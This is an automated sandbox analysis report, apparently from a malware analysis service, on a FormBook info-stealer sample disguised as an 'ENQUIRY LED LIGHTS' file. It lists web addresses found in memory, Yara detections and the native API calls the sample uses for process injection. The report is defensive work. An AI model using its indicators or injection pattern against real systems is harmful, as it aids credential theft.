            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/#person
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/#website
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/cart/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/comments/feed/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/contact-us/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/feed/
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/my-account/
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/shop/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wishlist/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-admin/admin-ajax.php
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/plugins/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/bootstrap.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/dynamic_style.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/shortcodes.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/theme_css_vars.css?ver=7.1.14
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-json/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/xmlrpc.php?rsd

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: ENQUIRY LED LIGHTS.pif.exe
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0042CE6F NtClose,3_2_0042CE6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52B60 NtClose,LdrInitializeThunk,3_2_02F52B60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02F52C70
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02F52DF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F535C0 NtCreateMutant,LdrInitializeThunk,3_2_02F535C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F54340 NtSetContextThread,3_2_02F54340
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F54650 NtSuspendThread,3_2_02F54650
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52AF0 NtWriteFile,3_2_02F52AF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52AD0 NtReadFile,3_2_02F52AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52AB0 NtWaitForSingleObject,3_2_02F52AB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52BF0 NtAllocateVirtualMemory,3_2_02F52BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52BE0 NtQueryValueKey,3_2_02F52BE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52BA0 NtEnumerateValueKey,3_2_02F52BA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52B80 NtQueryInformationFile,3_2_02F52B80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52EE0 NtQueueApcThread,3_2_02F52EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52EA0 NtAdjustPrivilegesToken,3_2_02F52EA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52E80 NtReadVirtualMemory,3_2_02F52E80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52E30 NtWriteVirtualMemory,3_2_02F52E30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52FE0 NtCreateFile,3_2_02F52FE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52FB0 NtResumeThread,3_2_02F52FB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52FA0 NtQuerySection,3_2_02F52FA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52F90 NtProtectVirtualMemory,3_2_02F52F90
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52F60 NtCreateProcessEx,3_2_02F52F60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52F30 NtCreateSection,3_2_02F52F30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52CF0 NtOpenProcess,3_2_02F52CF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52CC0 NtQueryVirtualMemory,3_2_02F52CC0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52CA0 NtQueryInformationToken,3_2_02F52CA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52C60 NtCreateKey,3_2_02F52C60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52C00 NtQueryInformationProcess,3_2_02F52C00
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52DD0 NtDelayExecution,3_2_02F52DD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52DB0 NtEnumerateKey,3_2_02F52DB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52D30 NtUnmapViewOfSection,3_2_02F52D30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52D10 NtMapViewOfSection,3_2_02F52D10
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52D00 NtSetInformationFile,3_2_02F52D00
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53090 NtSetValueKey,3_2_02F53090
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53010 NtOpenDirectoryObject,3_2_02F53010
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F539B0 NtGetContextThread,3_2_02F539B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53D70 NtOpenThread,3_2_02F53D70
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F53D10 NtOpenProcessToken,3_2_02F53D10
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B4650 NtSuspendThread,LdrInitializeThunk,8_2_051B4650
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B4340 NtSetContextThread,LdrInitializeThunk,8_2_051B4340
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_051B2D10
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_051B2D30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2DD0 NtDelayExecution,LdrInitializeThunk,8_2_051B2DD0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_051B2DF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_051B2C70
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2C60 NtCreateKey,LdrInitializeThunk,8_2_051B2C60
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_051B2CA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2F30 NtCreateSection,LdrInitializeThunk,8_2_051B2F30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2FB0 NtResumeThread,LdrInitializeThunk,8_2_051B2FB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2FE0 NtCreateFile,LdrInitializeThunk,8_2_051B2FE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_051B2E80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_051B2EE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2B60 NtClose,LdrInitializeThunk,8_2_051B2B60
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_051B2BA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_051B2BF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_051B2BE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2AD0 NtReadFile,LdrInitializeThunk,8_2_051B2AD0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2AF0 NtWriteFile,LdrInitializeThunk,8_2_051B2AF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B35C0 NtCreateMutant,LdrInitializeThunk,8_2_051B35C0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B39B0 NtGetContextThread,LdrInitializeThunk,8_2_051B39B0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2D00 NtSetInformationFile,8_2_051B2D00
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2DB0 NtEnumerateKey,8_2_051B2DB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2C00 NtQueryInformationProcess,8_2_051B2C00
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2CC0 NtQueryVirtualMemory,8_2_051B2CC0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2CF0 NtOpenProcess,8_2_051B2CF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2F60 NtCreateProcessEx,8_2_051B2F60
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2F90 NtProtectVirtualMemory,8_2_051B2F90
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2FA0 NtQuerySection,8_2_051B2FA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2E30 NtWriteVirtualMemory,8_2_051B2E30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2EA0 NtAdjustPrivilegesToken,8_2_051B2EA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2B80 NtQueryInformationFile,8_2_051B2B80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B2AB0 NtWaitForSingleObject,8_2_051B2AB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3010 NtOpenDirectoryObject,8_2_051B3010
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3090 NtSetValueKey,8_2_051B3090
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3D10 NtOpenProcessToken,8_2_051B3D10
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B3D70 NtOpenThread,8_2_051B3D70
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B8F20 NtCreateFile,8_2_032B8F20
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9370 NtAllocateVirtualMemory,8_2_032B9370
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9210 NtClose,8_2_032B9210
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9170 NtDeleteFile,8_2_032B9170
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032B9080 NtReadFile,8_2_032B9080
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_00CED63C0_2_00CED63C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C1E7680_2_04C1E768
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C19CA80_2_04C19CA8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C11BF00_2_04C11BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C1E7580_2_04C1E758
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C100400_2_04C10040
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C100070_2_04C10007
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_04C19C980_2_04C19C98
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_06B500400_2_06B50040
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00418DEF3_2_00418DEF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040301C3_2_0040301C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004108FF3_2_004108FF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040E97F3_2_0040E97F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004039F13_2_004039F1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004039FC3_2_004039FC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004013503_2_00401350
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0042F48F3_2_0042F48F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004015403_2_00401540
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00402D3C3_2_00402D3C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004106DF3_2_004106DF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00416FDA3_2_00416FDA
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00416FDF3_2_00416FDF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA02C03_2_02FA02C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC02743_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F03_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE03E63_2_02FE03E6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA3523_2_02FDA352
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB20003_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD81CC3_2_02FD81CC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE01AA3_2_02FE01AA
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD41A23_2_02FD41A2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA81583_2_02FA8158
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA1183_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F101003_2_02F10100
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3C6E03_2_02F3C6E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1C7C03_2_02F1C7C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F207703_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F447503_2_02F44750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCE4F63_2_02FCE4F6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD24463_2_02FD2446
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC44203_2_02FC4420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE05913_2_02FE0591
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F205353_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA803_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD6BD73_2_02FD6BD7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDAB403_2_02FDAB40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E8F03_2_02F4E8F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F068B83_2_02F068B8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F228403_2_02F22840
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2A8403_2_02F2A840
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A03_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FEA9A63_2_02FEA9A6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F369623_2_02F36962
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDEEDB3_2_02FDEEDB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32E903_2_02F32E90
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDCE933_2_02FDCE93
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20E593_2_02F20E59
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDEE263_2_02FDEE26
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12FC83_2_02F12FC8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9EFA03_2_02F9EFA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F94F403_2_02F94F40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40F303_2_02F40F30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC2F303_2_02FC2F30
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F62F283_2_02F62F28
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10CF23_2_02F10CF2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0CB53_2_02FC0CB5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20C003_2_02F20C00
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1ADE03_2_02F1ADE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F38DBF3_2_02F38DBF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBCD1F3_2_02FBCD1F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2AD003_2_02F2AD00
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3D2F03_2_02F3D2F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC12ED3_2_02FC12ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3B2C03_2_02F3B2C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F252A03_2_02F252A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F6739A3_2_02F6739A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0D34C3_2_02F0D34C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD132D3_2_02FD132D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD70E93_2_02FD70E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDF0E03_2_02FDF0E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCF0CC3_2_02FCF0CC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F270C03_2_02F270C0
